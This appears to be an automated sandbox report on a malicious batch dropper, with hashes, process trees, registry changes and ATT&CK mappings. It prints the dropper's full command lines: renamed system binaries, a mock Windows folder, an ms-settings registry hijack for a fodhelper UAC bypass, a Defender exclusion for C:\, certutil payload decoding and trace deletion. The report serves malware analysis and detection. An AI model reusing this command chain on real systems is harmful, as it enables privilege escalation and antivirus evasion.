912b9cf7a4906c96b43814617ea1814872ce14412561246c6c59c85901f46821

General

Target

BCC0174237_DRAFT_BL.cmd
Size

4.0MB
MD5

0889785a3d5ca52a21524b294eee7fbb
SHA1

2b1ea80536647537cd5cf9ce6305815f8792b6e2
SHA256

15ed7a1bb6747d6afb7c1665ba33c30c4fa611bc840a8f4e48a8681344419ba1
SHA512

f4e9a26a5f01b39bc391b85eeccb19d46d145cd9338cff0b3e4c53b90d84748c7f12d98597e58b65a5cec98b25ae3e1441332ab7478d38f2fe6eb7c313763fe3
SSDEEP

24576:VOHooIG6mM861SoDFFfcTBmMTdcIxBJGhRCyNaiBKkPK5:VOHooIBPLs/mMRcNaiBKkPK5

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 24 IoCs

Processes:

alpha.exealpha.exealpha.exealpha.exekn.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exekn.exealpha.exePing_c.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exe

pid	process
2868	alpha.exe
2924	alpha.exe
2276	alpha.exe
2068	alpha.exe
2644	kn.exe
2692	alpha.exe
2816	alpha.exe
2724	alpha.exe
2756	alpha.exe
2716	xkn.exe
2472	alpha.exe
2528	ger.exe
2520	alpha.exe
2960	kn.exe
2076	alpha.exe
1516	Ping_c.pif
1664	alpha.exe
1988	alpha.exe
2512	alpha.exe
936	alpha.exe
1444	alpha.exe
1900	alpha.exe
1640	alpha.exe
2440	alpha.exe

Loads dropped DLL 19 IoCs

Processes:

cmd.exealpha.exealpha.exexkn.exealpha.exealpha.exe

pid	process
2188	cmd.exe
2188	cmd.exe
2188	cmd.exe
2188	cmd.exe
2068	alpha.exe
2188	cmd.exe
2188	cmd.exe
2188	cmd.exe
2188	cmd.exe
2756	alpha.exe
2716	xkn.exe
2716	xkn.exe
2716	xkn.exe
2472	alpha.exe
2188	cmd.exe
2520	alpha.exe
2188	cmd.exe
2188	cmd.exe
2188	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2904 taskkill.exe

pid	process
2904	taskkill.exe

Modifies registry class 5 IoCs

Processes:

ger.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open	ger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\""	ger.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

Ping_c.pif

pid process

1516 Ping_c.pif
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

xkn.exe

pid process

2716 xkn.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

xkn.exetaskkill.exe

description pid process

Token: SeDebugPrivilege 2716 xkn.exe
Token: SeDebugPrivilege 2904 taskkill.exe

pid	process
1516	Ping_c.pif

pid	process
2716	xkn.exe

description	pid	process
Token: SeDebugPrivilege	2716	xkn.exe
Token: SeDebugPrivilege	2904	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exe

description	pid	process	target process
PID 2188 wrote to memory of 1692	2188	cmd.exe	extrac32.exe
PID 2188 wrote to memory of 1692	2188	cmd.exe	extrac32.exe
PID 2188 wrote to memory of 1692	2188	cmd.exe	extrac32.exe
PID 2188 wrote to memory of 2868	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2868	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2868	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2924	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2924	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2924	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2276	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2276	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2276	2188	cmd.exe	alpha.exe
PID 2276 wrote to memory of 2804	2276	alpha.exe	extrac32.exe
PID 2276 wrote to memory of 2804	2276	alpha.exe	extrac32.exe
PID 2276 wrote to memory of 2804	2276	alpha.exe	extrac32.exe
PID 2188 wrote to memory of 2068	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2068	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2068	2188	cmd.exe	alpha.exe
PID 2068 wrote to memory of 2644	2068	alpha.exe	kn.exe
PID 2068 wrote to memory of 2644	2068	alpha.exe	kn.exe
PID 2068 wrote to memory of 2644	2068	alpha.exe	kn.exe
PID 2188 wrote to memory of 2692	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2692	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2692	2188	cmd.exe	alpha.exe
PID 2692 wrote to memory of 2608	2692	alpha.exe	extrac32.exe
PID 2692 wrote to memory of 2608	2692	alpha.exe	extrac32.exe
PID 2692 wrote to memory of 2608	2692	alpha.exe	extrac32.exe
PID 2188 wrote to memory of 2816	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2816	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2816	2188	cmd.exe	alpha.exe
PID 2816 wrote to memory of 2968	2816	alpha.exe	extrac32.exe
PID 2816 wrote to memory of 2968	2816	alpha.exe	extrac32.exe
PID 2816 wrote to memory of 2968	2816	alpha.exe	extrac32.exe
PID 2188 wrote to memory of 2724	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2724	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2724	2188	cmd.exe	alpha.exe
PID 2724 wrote to memory of 2640	2724	alpha.exe	extrac32.exe
PID 2724 wrote to memory of 2640	2724	alpha.exe	extrac32.exe
PID 2724 wrote to memory of 2640	2724	alpha.exe	extrac32.exe
PID 2188 wrote to memory of 2756	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2756	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2756	2188	cmd.exe	alpha.exe
PID 2756 wrote to memory of 2716	2756	alpha.exe	xkn.exe
PID 2756 wrote to memory of 2716	2756	alpha.exe	xkn.exe
PID 2756 wrote to memory of 2716	2756	alpha.exe	xkn.exe
PID 2716 wrote to memory of 2472	2716	xkn.exe	alpha.exe
PID 2716 wrote to memory of 2472	2716	xkn.exe	alpha.exe
PID 2716 wrote to memory of 2472	2716	xkn.exe	alpha.exe
PID 2472 wrote to memory of 2528	2472	alpha.exe	ger.exe
PID 2472 wrote to memory of 2528	2472	alpha.exe	ger.exe
PID 2472 wrote to memory of 2528	2472	alpha.exe	ger.exe
PID 2188 wrote to memory of 2520	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2520	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2520	2188	cmd.exe	alpha.exe
PID 2520 wrote to memory of 2960	2520	alpha.exe	kn.exe
PID 2520 wrote to memory of 2960	2520	alpha.exe	kn.exe
PID 2520 wrote to memory of 2960	2520	alpha.exe	kn.exe
PID 2188 wrote to memory of 2076	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2076	2188	cmd.exe	alpha.exe
PID 2188 wrote to memory of 2076	2188	cmd.exe	alpha.exe
PID 2076 wrote to memory of 2904	2076	alpha.exe	taskkill.exe
PID 2076 wrote to memory of 2904	2076	alpha.exe	taskkill.exe
PID 2076 wrote to memory of 2904	2076	alpha.exe	taskkill.exe
PID 2188 wrote to memory of 1516	2188	cmd.exe	Ping_c.pif

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\BCC0174237_DRAFT_BL.cmd"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2188

C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
2⤵
PID:1692

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
2⤵
- Executes dropped EXE
PID:2868

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
2⤵
- Executes dropped EXE
PID:2924

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2276

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
3⤵
PID:2804

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BCC0174237_DRAFT_BL.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2068

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BCC0174237_DRAFT_BL.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
3⤵
- Executes dropped EXE
PID:2644

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2692

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
3⤵
PID:2608

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2816

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
3⤵
PID:2968

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2724

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
3⤵
PID:2640

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2756

C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2716

C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2472

C:\Users\Public\ger.exe
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
5⤵
- Executes dropped EXE
- Modifies registry class
PID:2528

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2520

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
3⤵
- Executes dropped EXE
PID:2960

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2076

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2904

C:\Users\Public\Libraries\Ping_c.pif
C:\Users\Public\Libraries\Ping_c.pif
2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1516

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
2⤵
- Executes dropped EXE
PID:1664

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
2⤵
- Executes dropped EXE
PID:1988

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
2⤵
- Executes dropped EXE
PID:2512

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:936

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:1444

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:1900

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:1640

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2440

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Libraries\Ping_c.pif

Filesize
1.3MB

MD5
f70fc5241b5a87da4a6cd562bdcff4db

SHA1
bef91b9ce40fd0f36720ec6b8d895f3895645a78

SHA256
5e56eeb51d7cc95afc89da99aa644593576e51702d599777d129029d55346dea

SHA512
73a37d60988f71b9bdcc60942b6e57d1cdbee8a46d06cdb4b0d0ac39bcf9ebc4bdeaf0460cefc92a398042228fb4ddc9cb6f5fea4a72f7b53bd8b202aeb795ad

Download Submit
C:\Users\Public\Ping_c.mp4

Filesize
2.6MB

MD5
b5a262795568eb0ab37138d1601d719b

SHA1
6c528887798a8062eb0b5e44b7bf4ff63e6ee3a5

SHA256
330657b94dd59c84031e4d288a894e414c478c5d36b0d16644dca61e2c2ef885

SHA512
06668f3ffe3fc7828a1470acd2f2020f86ddcfded6d4ee8dfcedf7c0fd0ee60faa4dcd8fc05e6bd2b4a5fe8355be1d4d89977d44425387dacca6f8c3295037c8

Download Submit
C:\Users\Public\ger.exe

Filesize
73KB

MD5
9d0b3066fe3d1fd345e86bc7bcced9e4

SHA1
e05984a6671fcfecbc465e613d72d42bda35fd90

SHA256
4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e

SHA512
d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119

Download Submit
\Users\Public\alpha.exe

Filesize
337KB

MD5
5746bd7e255dd6a8afa06f7c42c1ba41

SHA1
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

SHA256
db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

SHA512
3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Download Submit
\Users\Public\kn.exe

Filesize
1.1MB

MD5
ec1fd3050dbc40ec7e87ab99c7ca0b03

SHA1
ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

SHA256
1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

SHA512
4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

Download Submit
\Users\Public\xkn.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/1516-77-0x0000000000400000-0x000000000055C000-memory.dmp

Filesize
1.4MB

Download
memory/2716-43-0x000000001B4A0000-0x000000001B782000-memory.dmp

Filesize
2.9MB

Download
memory/2716-44-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads